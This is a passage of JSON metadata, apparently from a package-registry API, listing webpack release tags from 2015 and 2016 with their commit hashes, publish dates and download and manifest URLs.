https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependenci